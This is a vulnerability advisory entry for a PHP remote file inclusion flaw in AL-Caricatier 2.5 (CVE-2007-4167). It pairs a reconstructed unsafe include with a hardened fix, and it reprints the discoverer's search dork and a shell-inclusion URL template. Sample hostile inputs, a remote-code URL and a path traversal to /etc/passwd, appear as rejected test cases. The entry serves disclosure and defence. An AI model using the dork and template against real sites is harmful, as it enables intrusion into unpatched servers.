AL-Caricatier 'cat_viewed.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1189560    Vulnerability type: Unknown
Published: 2007-08-07    Updated: 2007-08-07
CVE: CVE-2007-4167    CNNVD ID: CNNVD-200708-074
Platform: N/A    CVSS score: 7.5
|Vulnerability sources
https://www.securityfocus.com/bid/85516
https://cxsecurity.com/issue/WLB-2007080029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-074
|Vulnerability details
AL-Caricatier 2.5 contains a PHP remote file inclusion vulnerability in cat_viewed.php. A remote attacker can execute arbitrary PHP code via a URL supplied in the CatName parameter.
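The defect class above is an include statement whose path is built from a request parameter. The following is an added example, not AL-Caricatier's own code (the real cat_viewed.php source is not on this page): a hypothetical reconstruction of the unsafe pattern next to a hardened version that restricts CatName to an identifier allowlist and confines the resolved path to a fixed directory. The function names, the categories/ directory and the sample requests are assumptions.

```php
<?php
// Added example, not AL-Caricatier's code. The vulnerable function is a
// hypothetical reconstruction of the pattern described in the advisory.

// --- Unsafe pattern (hypothetical) ---
// The include path is taken from user input. When PHP is configured to allow
// URL includes, a value such as http://host/file makes PHP fetch and execute
// remote code; a value such as ../../path reads local files instead.
function show_category_unsafe(string $catName): void
{
    include $catName . '.php';   // tainted path, never do this
}

// --- Hardened pattern ---
// 1. Accept only a short identifier (letters, digits, underscore).
// 2. Resolve against a fixed directory and verify the result stays inside it.
const CATEGORY_DIR = __DIR__ . '/categories';   // assumed layout

function resolve_category_file(string $catName): ?string
{
    // Reject URLs, path separators, null bytes and anything else not in the allowlist.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $catName)) {
        return null;
    }
    $base = realpath(CATEGORY_DIR);
    $candidate = realpath(CATEGORY_DIR . '/' . $catName . '.php');
    // realpath() returns false for missing files; the prefix check guards
    // against symlinks or other tricks that could leave CATEGORY_DIR.
    if ($base === false || $candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

function show_category_safe(string $catName): void
{
    $file = resolve_category_file($catName);
    if ($file === null) {
        http_response_code(400);
        echo 'Unknown category';
        return;
    }
    include $file;
}

// Constructed sample requests and the outcome of the hardened version:
//   ?CatName=sports                  -> included if categories/sports.php exists
//   ?CatName=http://example.invalid/x -> rejected by the identifier check
//   ?CatName=../../etc/passwd        -> rejected by the identifier check
show_category_safe($_GET['CatName'] ?? '');
```

The allowlist is the primary control; the realpath() prefix check is defence in depth. Independently of the code fix, setting allow_url_include = Off in php.ini (and allow_url_fopen = Off where the application does not need it) removes the remote half of the problem for every include on the host, and a web server or WAF rule that flags request parameters beginning with http:// or ftp:// gives a cheap detection signal for this vulnerability class.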
|Exploit
Discovered By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com , Hacker_Web (at) W (dot) Cn , Gunman_Pump (at) Hotmail (dot) Com
----------------------------
Greetz : Muhammed Zeed , Alaadin Gamos
----------------------------
Script: AL-Caricatier,V.2.5
----------------------------
Dork: "AL-Caricatier,V.2.5"
----------------------------
B.File: cat_viewed.php
----------------------------
Vuln code: cat_viewed.php?op=open&CatID=$CatID&CatName=$CatName
----------------------------
Exploit:
www.name.com/AL-Caricatier,V.2.5/cat_viewed.php?op=open&CatID=$CatID&CatName=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
|Affected products
AL-Caricatier AL-Caricatier 2.5
|References

Source: BUGTRAQ
Name: 20070804 AL-Caricatier V.2.5 Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/475641/100/0/threaded
Source: OSVDB
Name: 39254
Link: http://osvdb.org/39254
Source: XF
Name: alcaricatier-catviewed-xss(35810)
Link: http://xforce.iss.net/xforce/xfdb/35810
Source: SREASON
Name: 2962
Link: http://securityreason.com/securityalert/2962